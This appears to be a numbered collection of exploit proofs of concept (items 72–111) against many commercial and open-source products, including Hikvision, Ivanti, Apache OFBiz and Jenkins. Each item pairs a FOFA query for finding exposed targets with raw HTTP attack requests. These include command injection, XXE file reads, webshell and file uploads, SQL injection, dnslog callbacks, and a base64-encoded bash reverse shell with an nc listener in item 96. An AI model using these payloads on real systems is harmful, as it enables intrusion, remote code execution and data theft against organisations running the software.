Upgrade-Insecure-Requests: 1

72. Seeyon OA (致远OA) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-Server (致远M3-server) 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec campus service management platform (新开普掌上校园服务管理平台) service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software (F22服装管理软件系统) UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system (建设工程质量监督系统) FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata Tianyao software (速达天耀软件) DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi LOGBASE operations security management system (思福迪LOGBASE运维安全管理系统) test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity Mingyu security gateway (安恒明御安全网关) aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAPPSecurity Mingyu security gateway (安恒明御安全网关) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform (致远互联FE协作办公平台) editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system (海康威视IP网络对讲广播系统) 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform (海康威视综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center (海康威视运行管理中心) session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin Legendsec SecGate 3600 firewall (奇安信网神SecGate3600防火墙) app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
      <param>
      <value>
        <struct>
       <member>
          <name>test</name>
          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
          </value>
        </member>
      </struct>
      </value>
    </param>
    </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
